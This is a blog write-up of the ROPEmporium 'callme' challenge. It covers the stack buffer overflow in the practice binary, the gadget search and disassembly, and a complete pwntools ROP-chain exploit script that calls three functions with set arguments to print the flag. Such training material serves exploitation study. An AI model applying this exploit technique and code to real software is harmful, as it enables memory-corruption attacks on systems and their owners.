<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.2.0">

<link rel="preconnect" href="https://fonts.googleapis.com" crossorigin>
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"thuri10.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"default"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="IntroductionChallenge Description The goal of the challenge is understanding how more than one argument is passed in x64 function. The challenge can be downloaded from the author&#96;s website ropempo">
<meta property="og:type" content="blog">
<meta property="og:title" content="ROPEmporium callme challenge">
<meta property="og:url" content="http://thuri10.github.io/2021/12/20/ROP-callme/index.html">
<meta property="og:site_name" content="LaByte">
<meta property="og:description" content="IntroductionChallenge Description The goal of the challenge is understanding how more than one argument is passed in x64 function. The challenge can be downloaded from the author&#96;s website ropempo">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://thuri10.github.io/images/ropemporium/callme_bug.png">
<meta property="og:image" content="http://thuri10.github.io/images/ropemporium/stack.png">
<meta property="og:image" content="http://thuri10.github.io/images/ropemporium/poprdi_callme.png">
<meta property="og:image" content="http://thuri10.github.io/images/ropemporium/callme-flag.png">
<meta property="article:published_time" content="2021-12-20T20:20:31.000Z">
<meta property="article:modified_time" content="2022-09-23T10:11:26.414Z">
<meta property="article:author" content="Thuri">
<meta property="article:tag" content="ropemporium">
<meta property="article:tag" content="rop">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://thuri10.github.io/images/ropemporium/callme_bug.png">


<link rel="canonical" href="http://thuri10.github.io/2021/12/20/ROP-callme/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://thuri10.github.io/2021/12/20/ROP-callme/","path":"2021/12/20/ROP-callme/","title":"ROPEmporium callme challenge"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>ROPEmporium callme challenge | LaByte</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">LaByte</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Messing Bits</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Introduction"><span class="nav-text">Introduction</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Thuri</p>
  <div class="site-description" itemprop="description">Messy Bits</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/thuri10" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;thuri10" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:thuri783@gmail.com" title="E-Mail → mailto:thuri783@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/0xhexski" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;0xhexski" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
  </div>
  <div class="cc-license site-overview-item animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://thuri10.github.io/2021/12/20/ROP-callme/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Thuri">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LaByte">
      <meta itemprop="description" content="Messy Bits">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="ROPEmporium callme challenge | LaByte">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ROPEmporium callme challenge
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: December 20 2021 23:20:31" itemprop="dateCreated datePublished" datetime="2021-12-20T23:20:31+03:00">December 20 2021</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>Challenge Description</p>
<p>The goal of the challenge is understanding how more than one argument is passed in x64 function. The challenge can be downloaded from the author&#96;s website <a target="_blank" rel="noopener" href="https://ropemporium.com/">ropemporium</a></p>
<span id="more"></span>

<blockquote>
<p>Reliably make consecutive calls to imported functions.<br>Use some new techniques and learn about the Procedure Linkage Table.</p>
</blockquote>
<p>The program needs make consecutive calls to a function with three arguments in order to get a correct flag. The challenge description is similar to the split challenge.</p>
<blockquote>
<p><strong>You must call the callme_one(), callme_two() and callme_three() functions in that order, each with the arguments 0xdeadbeef, 0xcafebabe, 0xd00df00d e.g. callme_one(0xdeadbeef, 0xcafebabe, 0xd00df00d) to print the flag. For the x86_64 binary double up those values, e.g. callme_one(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)</strong></p>
</blockquote>
<p>check the binary protections enabled on the <code>callme</code> binary, only <strong>NX</strong>( Not Executable) is enabled on the binary as shown below.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">vx@archie:callme$ checksec --file callme
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span class="token punctuation">(</span>0x400000<span class="token punctuation">)</span>
    RUNPATH:  b<span class="token string">'.'</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Open <strong>callme</strong> binary in radare2 to look for exploitable vulnerability and examine the behavior. radare2 is a powerful disassembler&#x2F;debugging tool used for examining the behavior of programs.</p>
<p><img data-src="/images/ropemporium/callme_bug.png"></p>
<p>From the above image we use <strong>pdf</strong> command to disassemble a given function. Function <strong>pwnme</strong> looks similar to the previous challenges ret2win and split.</p>
<p>From the aDisassembled program, we are filling a buffer of size 0x20(32bytes) with a constant byte of zero. memset is used to overwrite any values that is present in the memory area specified. The memory area we are overwriting is [rbp-0x20]. This means we are allocating a memory buffer of size 32bytes from the address of base pointer in the stack.<br><img data-src="/images/ropemporium/stack.png"></p>
<p>Next function is read function, which reads for user input and stores in the allocated buffer.</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token class-name">ssize_t</span> <span class="token function">read</span><span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span> <span class="token keyword">void</span> <span class="token operator">*</span>buf<span class="token punctuation">,</span> <span class="token class-name">size_t</span> count<span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>From assembly code, we are reading <code>0x200</code> bytes from the standard input file descriptor and storing it in buffer, meaning we are reading more than what the buffer can hold therefore leading to a stack buffer overflow.</p>
<p>For exploitation stack overflow, fill the buffer, overwrite rbp register and control the return address with desired address.</p>
<p>Because the system function receives one argument, look for one gadgets that we control the rdi, rsi and rdx registers.</p>
<p><strong>What are gadgets?</strong></p>
<p>Gadgets are sequence of instructions the end with ret. because we want to load three argument into registers, we will look for a pop rdi, pop rsi, pop rdx; ret instruction in order to pass an arguments to the callme_one, callme_two, callme_three functions.</p>
<p>The example of the <strong>pop rdi,pop rsi,pop rdx, ret</strong> gadget is shown in image below.</p>
<p><img data-src="/images/ropemporium/poprdi_callme.png"><br>Next is determine addresses of <code>callme_one</code>, <code>callme_two</code>, <code>callme_three</code> functions using gdb.</p>
<pre class="line-numbers language-nasm" data-language="nasm"><code class="language-nasm">(gdb) info functions
All defined functions:
Non<span class="token operator">-</span>debugging symbols:
<span class="token number">0x00000000004006a8</span>  _init
<span class="token number">0x00000000004006d0</span>  puts@plt
<span class="token number">0x00000000004006e0</span>  printf@plt
<span class="token number">0x00000000004006f0</span>  callme_three@plt
<span class="token number">0x0000000000400700</span>  memset@plt
<span class="token number">0x0000000000400710</span>  read@plt
<span class="token number">0x0000000000400720</span>  callme_one@plt
<span class="token number">0x0000000000400730</span>  setvbuf@plt
<span class="token number">0x0000000000400740</span>  callme_two@plt
<span class="token number">0x0000000000400750</span>  exit@plt
<span class="token number">0x0000000000400760</span>  _start
<span class="token number">0x0000000000400790</span>  _dl_relocate_static_pie
<span class="token number">0x00000000004007a0</span>  deregister_tm_clones
<span class="token number">0x00000000004007d0</span>  register_tm_clones
<span class="token number">0x0000000000400810</span>  __do_<span class="token keyword">global_dtors_aux</span>
<span class="token number">0x0000000000400840</span>  frame_dummy
<span class="token number">0x0000000000400847</span>  main
<span class="token number">0x0000000000400898</span>  pwnme
<span class="token number">0x00000000004008f2</span>  usefulFunction
<span class="token number">0x000000000040093c</span>  usefulGadgets
<span class="token number">0x0000000000400940</span>  __libc_csu_init
<span class="token number">0x00000000004009b0</span>  __libc_csu_fini
<span class="token number">0x00000000004009b4</span>  _fini
(gdb)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Reverse engineer one of the target function in order to understand how the arguments are passed to the function.Because the <strong>callme</strong> binary does PLT relocations of the functions of callme, disassemble the target shared library <strong>libcallme.so</strong> as shown below.</p>
<pre class="line-numbers language-nasm" data-language="nasm"><code class="language-nasm"><span class="token label function">vx@archie:</span>callme<span class="token operator">$</span> gdb <span class="token operator">-</span>q libcallme.so
Reading symbols from libcallme.so...
(No debugging symbols found in libcallme.so)
(gdb) disas callme_one
Dump of assembler code for function callme_one:
   <span class="token number">0x000000000000081a</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">0</span><span class="token operator">></span>:	push   <span class="token register variable">rbp</span>
   <span class="token number">0x000000000000081b</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">1</span><span class="token operator">></span>:	mov    <span class="token register variable">rbp</span>,<span class="token register variable">rsp</span>
   <span class="token number">0x000000000000081e</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">4</span><span class="token operator">></span>:	sub    <span class="token register variable">rsp</span>,<span class="token number">0x30</span>
   <span class="token number">0x0000000000000822</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">8</span><span class="token operator">></span>:	mov    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x18</span><span class="token operator">]</span>,<span class="token register variable">rdi</span>
   <span class="token number">0x0000000000000826</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">12</span><span class="token operator">></span>:	mov    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x20</span><span class="token operator">]</span>,<span class="token register variable">rsi</span>
   <span class="token number">0x000000000000082a</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">16</span><span class="token operator">></span>:	mov    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x28</span><span class="token operator">]</span>,<span class="token register variable">rdx</span>
   <span class="token number">0x000000000000082e</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">20</span><span class="token operator">></span>:	movabs <span class="token register variable">rax</span>,<span class="token number">0xdeadbeefdeadbeef</span>
   <span class="token number">0x0000000000000838</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">30</span><span class="token operator">></span>:	cmp    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x18</span><span class="token operator">]</span>,<span class="token register variable">rax</span>
   <span class="token number">0x000000000000083c</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">34</span><span class="token operator">></span>:	jne    <span class="token number">0x912</span> <span class="token operator">&lt;</span>callme_one<span class="token operator">+</span><span class="token number">248</span><span class="token operator">></span>
   <span class="token number">0x0000000000000842</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">40</span><span class="token operator">></span>:	movabs <span class="token register variable">rax</span>,<span class="token number">0xcafebabecafebabe</span>
   <span class="token number">0x000000000000084c</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">50</span><span class="token operator">></span>:	cmp    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x20</span><span class="token operator">]</span>,<span class="token register variable">rax</span>
   <span class="token number">0x0000000000000850</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">54</span><span class="token operator">></span>:	jne    <span class="token number">0x912</span> <span class="token operator">&lt;</span>callme_one<span class="token operator">+</span><span class="token number">248</span><span class="token operator">></span>
   <span class="token number">0x0000000000000856</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">60</span><span class="token operator">></span>:	movabs <span class="token register variable">rax</span>,<span class="token number">0xd00df00dd00df00d</span>
   <span class="token number">0x0000000000000860</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">70</span><span class="token operator">></span>:	cmp    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x28</span><span class="token operator">]</span>,<span class="token register variable">rax</span>
   <span class="token number">0x0000000000000864</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">74</span><span class="token operator">></span>:	jne    <span class="token number">0x912</span> <span class="token operator">&lt;</span>callme_one<span class="token operator">+</span><span class="token number">248</span><span class="token operator">></span>
   <span class="token number">0x000000000000086a</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">80</span><span class="token operator">></span>:	mov    QWORD PTR <span class="token operator">[</span><span class="token register variable">rbp</span><span class="token operator">-</span><span class="token number">0x8</span><span class="token operator">]</span>,<span class="token number">0x0</span>
   <span class="token number">0x0000000000000872</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">88</span><span class="token operator">></span>:	lea    <span class="token register variable">rsi</span>,<span class="token operator">[</span>rip<span class="token operator">+</span><span class="token number">0x32f</span><span class="token operator">]</span>        # <span class="token number">0xba8</span>
   <span class="token number">0x0000000000000879</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">95</span><span class="token operator">></span>:	lea    <span class="token register variable">rdi</span>,<span class="token operator">[</span>rip<span class="token operator">+</span><span class="token number">0x32a</span><span class="token operator">]</span>        # <span class="token number">0xbaa</span>
   <span class="token number">0x0000000000000912</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">248</span><span class="token operator">></span>:	lea    <span class="token register variable">rdi</span>,<span class="token operator">[</span>rip<span class="token operator">+</span><span class="token number">0x301</span><span class="token operator">]</span>        # <span class="token number">0xc1a</span>
   <span class="token number">0x0000000000000919</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">255</span><span class="token operator">></span>:	call   <span class="token number">0x6c0</span> <span class="token operator">&lt;</span>puts@plt<span class="token operator">></span>
   <span class="token number">0x000000000000091e</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">260</span><span class="token operator">></span>:	mov    <span class="token register variable">edi</span>,<span class="token number">0x1</span>
   <span class="token number">0x0000000000000923</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">265</span><span class="token operator">></span>:	call   <span class="token number">0x720</span> <span class="token operator">&lt;</span>exit@plt<span class="token operator">></span>
   <span class="token number">0x0000000000000928</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">270</span><span class="token operator">></span>:	nop
   <span class="token number">0x0000000000000929</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">271</span><span class="token operator">></span>:	leave
   <span class="token number">0x000000000000092a</span> <span class="token operator">&lt;</span><span class="token operator">+</span><span class="token number">272</span><span class="token operator">></span>:	ret
End of assembler dump.
(gdb)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>From the disassembly code above, the function compares the arguments passed to the callme_one function. If string values are not equal to values passed to the <code>rdi</code>, <code>rsi</code> and <code>rdx</code> registers the program exits, otherwise we get a flag.</p>
<p>From previous knowledge of solving other challenges, we need to overwrite the return address with controlled pop rdi, pop rsi, pop rdx, ret gadget and call each function in a sequential manner.</p>
<p>Fully working rop chain code.</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> pwn

<span class="token comment">#Various setting for pwntools</span>
pwn<span class="token punctuation">.</span>context<span class="token punctuation">.</span>encoding <span class="token operator">=</span> <span class="token string">"latin-1"</span>
pwn<span class="token punctuation">.</span>warnings<span class="token punctuation">.</span>simplefilter<span class="token punctuation">(</span><span class="token string">"ignore"</span><span class="token punctuation">)</span>
pwn<span class="token punctuation">.</span>context<span class="token punctuation">.</span>arch <span class="token operator">=</span> <span class="token string">"amd64"</span>

io <span class="token operator">=</span> pwn<span class="token punctuation">.</span>process<span class="token punctuation">(</span><span class="token string">'./callme'</span><span class="token punctuation">)</span>

pop_rdi_rsi_rdx <span class="token operator">=</span> pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0x0040093c</span><span class="token punctuation">)</span>  <span class="token comment">#pop rdi; pop rsi; pop rdx; ret gadget</span>
arg1 <span class="token operator">=</span> pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0xdeadbeefdeadbeef</span><span class="token punctuation">)</span>
arg2 <span class="token operator">=</span> pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0xcafebabecafebabe</span><span class="token punctuation">)</span>
arg3 <span class="token operator">=</span> pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0xd00df00dd00df00d</span><span class="token punctuation">)</span>

callme_one_addr <span class="token operator">=</span> pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0x0000000000400720</span><span class="token punctuation">)</span>
callme_two_addr <span class="token operator">=</span> pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0x0000000000400740</span><span class="token punctuation">)</span>
callme_three_addr <span class="token operator">=</span>pwn<span class="token punctuation">.</span>p64<span class="token punctuation">(</span><span class="token number">0x00000000004006f0</span><span class="token punctuation">)</span>

<span class="token comment">#call the callme_one function</span>
callme_one <span class="token operator">=</span> pop_rdi_rsi_rdx
callme_one <span class="token operator">+=</span> arg1
callme_one <span class="token operator">+=</span> arg2
callme_one <span class="token operator">+=</span> arg3
callme_one <span class="token operator">+=</span> callme_one_addr

<span class="token comment">#callme_two function</span>
callme_two <span class="token operator">=</span> pop_rdi_rsi_rdx
callme_two <span class="token operator">+=</span> arg1
callme_two <span class="token operator">+=</span> arg2
callme_two  <span class="token operator">+=</span> arg3
callme_two <span class="token operator">+=</span> callme_two_addr

<span class="token comment">#callme_three function</span>
callme_three <span class="token operator">=</span> pop_rdi_rsi_rdx
callme_three <span class="token operator">+=</span> arg1
callme_three <span class="token operator">+=</span> arg2
callme_three <span class="token operator">+=</span> arg3
callme_three <span class="token operator">+=</span> callme_three_addr

payload <span class="token operator">=</span> <span class="token string">b"A"</span> <span class="token operator">*</span><span class="token number">32</span>   <span class="token comment">#fill the buffer</span>
payload <span class="token operator">+=</span> <span class="token string">b"B"</span> <span class="token operator">*</span> <span class="token number">8</span>  <span class="token comment">#overwrite the rbp</span>
payload <span class="token operator">+=</span> callme_one
payload <span class="token operator">+=</span> callme_two
payload <span class="token operator">+=</span> callme_three

io<span class="token punctuation">.</span>writeafter<span class="token punctuation">(</span><span class="token string">'>'</span><span class="token punctuation">,</span> payload<span class="token punctuation">)</span>

pwn<span class="token punctuation">.</span>info<span class="token punctuation">(</span>io<span class="token punctuation">.</span>clean<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Successful execution of the above code, correct flag is printed.</p>
<p><img data-src="/images/ropemporium/callme-flag.png"></p>

    </div>

    
    
    
      


    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ropemporium/" rel="tag"># ropemporium</a>
              <a href="/tags/rop/" rel="tag"># rop</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/12/20/ROP-ret2csu/" rel="prev" title="RopEmporium ret2csu challenge">
                  <i class="fa fa-chevron-left"></i> RopEmporium ret2csu challenge
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/01/25/REMCOSrat-Macros/" rel="next" title="RemcosRAT Excel macro analysis">
                  RemcosRAT Excel macro analysis <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Thuri</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
